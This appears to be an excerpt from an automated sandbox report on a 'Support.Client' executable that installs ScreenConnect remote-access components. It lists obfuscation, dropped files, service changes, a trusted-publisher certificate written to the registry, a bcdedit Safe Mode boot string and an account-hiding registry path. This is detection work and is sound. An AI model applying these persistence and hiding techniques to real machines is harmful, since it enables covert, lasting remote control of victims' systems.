Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3505558952.000001EC9FF65000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA0407000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA02D6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1934412398.0000000002F92000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3505558952.000001EC9FF5D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.1932975838.0000000005602000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr

PE file contains a valid data directory to section mapping

Source: Support.Client (1).exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Support.Client (1).exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Support.Client (1).exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Support.Client (1).exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Support.Client (1).exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Binary contains a suspicious time stamp

Source: ScreenConnect.Windows.dll.1.dr

Static PE information: 0xE0021679 [Thu Feb 3 01:40:09 2089 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Support.Client (1).exe

0_2_00421000

PE file contains an invalid checksum

Source: Support.Client (1).exe

Static PE information: real checksum: 0x1cb11 should be: 0x14b19

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Support.Client (1).exe	Code function: 0_2_00421BC0 push ecx; ret	0_2_00421BD3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B77D2A5 pushad ; iretd	1_2_00007FFD9B77D2A6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B897D00 push eax; retf	1_2_00007FFD9B897D1D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B89842E pushad ; ret	1_2_00007FFD9B89845D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B89C3CF pushad ; retf	1_2_00007FFD9B89C3DD
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B89845E push eax; ret	1_2_00007FFD9B89846D
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 7_2_016D7318 push eax; retf	7_2_016D7319
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 7_2_016D7768 push esp; iretd	7_2_016D7769
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 8_2_042DB980 pushad ; ret	8_2_042DB993
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8D1BE5 push cs; retn FFFDh	9_2_00007FFD9B8D1D27
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8C7860 push eax; iretd	9_2_00007FFD9B8C786D
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8D785E push eax; iretd	9_2_00007FFD9B8D786D
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8D782E pushad ; iretd	9_2_00007FFD9B8D785D
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8C7569 push ebx; iretd	9_2_00007FFD9B8C756A
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8B22B1 push ebx; retf	9_2_00007FFD9B8B22FA
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8B096D push ebx; retf	9_2_00007FFD9B8B098A
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBB847A push ebp; ret	9_2_00007FFD9BBB84EA
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBB8240 push edx; ret	9_2_00007FFD9BBB824A
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBB89C5 push es; iretd	9_2_00007FFD9BBB8A85
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBB87C9 push edi; ret	9_2_00007FFD9BBB87EA
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBB7D6C push ss; iretd	9_2_00007FFD9BBB7DF5
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBB8178 push eax; ret	9_2_00007FFD9BBB818A
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBB8721 push edi; ret	9_2_00007FFD9BBB874A
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBB2F5A pushfd ; iretd	9_2_00007FFD9BBB2F5B
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBB5B17 push eax; iretd	9_2_00007FFD9BBB5BA9
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBB84BE push ebp; ret	9_2_00007FFD9BBB84EA
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBB82BD push ebx; ret	9_2_00007FFD9BBB830A
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 14_2_00007FFD9B8B22B1 push ebx; retf	14_2_00007FFD9B8B22FA
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 14_2_00007FFD9B8B096D push ebx; retf	14_2_00007FFD9B8B098A
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 14_2_00007FFD9BBB0448 push edx; ret	14_2_00007FFD9BBB7EEA
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 14_2_00007FFD9BBB8219 push ebp; ret	14_2_00007FFD9BBB823A

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exe	Jump to dropped file

May use bcdedit to modify the Windows boot settings

Source: ScreenConnect.ClientService.dll.1.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
Source: ScreenConnect.ClientService.dll0.1.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}

Boot Survival

Creates or modifies windows services

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application

Jump to behavior

Modifies existing windows services

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (9298e168-a0cf-488d-954c-5c180dd52fec)

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1944029579.000000001C132000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.exe, 00000007.00000002.1932080975.0000000001722000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3504545474.0000000002941000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000E.00000002.2894133080.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000E.00000002.2893684793.0000000001150000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.ClientService.dll.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll0.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.dll0.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Stores large binary data to the registry

Source: C:\Users\user\Desktop\Support.Client (1).exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
